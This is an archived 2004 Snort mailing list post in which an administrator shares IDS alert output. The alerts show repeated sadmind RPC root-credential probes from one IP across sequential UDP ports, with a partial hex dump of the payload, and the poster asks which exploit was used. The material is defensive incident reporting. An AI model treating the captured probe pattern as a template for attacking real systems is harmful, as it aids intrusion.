Snort mailing list archives
Suspicious Traffic
From: "ISP Toolz" <kevin () isptoolz com>
Date: Thu, 24 Jun 2004 20:25:52 -0400
Have any of you seen any traffic similar to this, or do you know what exploit or script was used to try and
overflow this system? Thanks.
Generated by ACID v0.9.6b23 on Thu, 24 Jun 2004 02:46:20 -0400
------------------------------------------------------------------------------
#(1 - 33320) [2004-06-21 12:33:33] [snort/2256] RPC sadmind query with root credentials attempt UDP
IPv4: 207.36.196.39 -> 68.82.247.65
hlen=5 TOS=0 dlen=1476 ID=14454 flags=0 offset=0 TTL=49 chksum=15571
UDP: port=60730 -> dport: 32770 len=1456
Payload: length = 1448
------------------------------------------------------------------------------
#(1 - 33321) [2004-06-21 12:33:37] [snort/2256] RPC sadmind query with root credentials attempt UDP
IPv4: 207.36.196.39 -> 68.82.247.65
hlen=5 TOS=0 dlen=1476 ID=14863 flags=0 offset=0 TTL=49 chksum=15162
UDP: port=60732 -> dport: 32771 len=1456
Payload: length = 1448
------------------------------------------------------------------------------
#(1 - 33322) [2004-06-21 12:33:42] [snort/2256] RPC sadmind query with root credentials attempt UDP
IPv4: 207.36.196.39 -> 68.82.247.65
hlen=5 TOS=0 dlen=1476 ID=15355 flags=0 offset=0 TTL=49 chksum=14670
UDP: port=60734 -> dport: 32772 len=1456
Payload: length = 1448
------------------------------------------------------------------------------
#(1 - 33323) [2004-06-21 12:33:46] [snort/2256] RPC sadmind query with root credentials attempt UDP
IPv4: 207.36.196.39 -> 68.82.247.65
hlen=5 TOS=0 dlen=1476 ID=15774 flags=0 offset=0 TTL=49 chksum=14251
UDP: port=60736 -> dport: 32773 len=1456
Payload: length = 1448
------------------------------------------------------------------------------
#(1 - 33324) [2004-06-21 12:33:50] [snort/2256] RPC sadmind query with root credentials attempt UDP
IPv4: 207.36.196.39 -> 68.82.247.65
hlen=5 TOS=0 dlen=1476 ID=16185 flags=0 offset=0 TTL=49 chksum=13840
UDP: port=60738 -> dport: 32774 len=1456
Payload: length = 1448
590 : 00 00 00 00 00 00 00 10 6E 65 74 6D 67 74 5F 65 ........netmgt_e
5a0 : 6E 64 6F 66 61 72 67 73 ndofargs
------------------------------------------------------------------------------
#(1 - 33325) [2004-06-21 12:33:54] [snort/2256] RPC sadmind query with root credentials attempt UDP
IPv4: 207.36.196.39 -> 68.82.247.65
hlen=5 TOS=0 dlen=1476 ID=16594 flags=0 offset=0 TTL=49 chksum=13431
UDP: port=60738 -> dport: 32775 len=1456
Payload: length = 1448
------------------------------------------------------------------------------
#(1 - 33326) [2004-06-21 12:33:55] [snort/2256] RPC sadmind query with root credentials attempt UDP
IPv4: 207.36.196.39 -> 68.82.247.65
hlen=5 TOS=0 dlen=1476 ID=16622 flags=0 offset=0 TTL=49 chksum=13403
UDP: port=60738 -> dport: 32776 len=1456
Payload: length = 1448
------------------------------------------------------------------------------
#(1 - 33327) [2004-06-21 12:33:55] [snort/2256] RPC sadmind query with root credentials attempt UDP
IPv4: 207.36.196.39 -> 68.82.247.65
hlen=5 TOS=0 dlen=1476 ID=16640 flags=0 offset=0 TTL=49 chksum=13385
UDP: port=60738 -> dport: 32777 len=1456
Payload: length = 1448
------------------------------------------------------------------------------
#(1 - 33328) [2004-06-21 12:33:55] [snort/2256] RPC sadmind query with root credentials attempt UDP
IPv4: 207.36.196.39 -> 68.82.247.65
hlen=5 TOS=0 dlen=1476 ID=16659 flags=0 offset=0 TTL=49 chksum=13366
UDP: port=60738 -> dport: 32778 len=1456
Payload: length = 1448
------------------------------------------------------------------------------
#(1 - 33329) [2004-06-21 12:33:55] [snort/2256] RPC sadmind query with root credentials attempt UDP
IPv4: 207.36.196.39 -> 68.82.247.65
hlen=5 TOS=0 dlen=1476 ID=16677 flags=0 offset=0 TTL=49 chksum=13348
UDP: port=60738 -> dport: 32779 len=1456
Payload: length = 1448
3f0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
400 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
410 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
420 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
430 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
440 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
450 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
460 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
470 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
480 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
490 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
4a0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
4b0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
4c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
4d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
4e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
4f0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
500 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
510 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
520 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
530 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
540 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
550 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
560 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
570 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
580 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
590 : 00 00 00 00 00 00 00 10 6E 65 74 6D 67 74 5F 65 ........netmgt_e
5a0 : 6E 64 6F 66 61 72 67 73 ndofargs
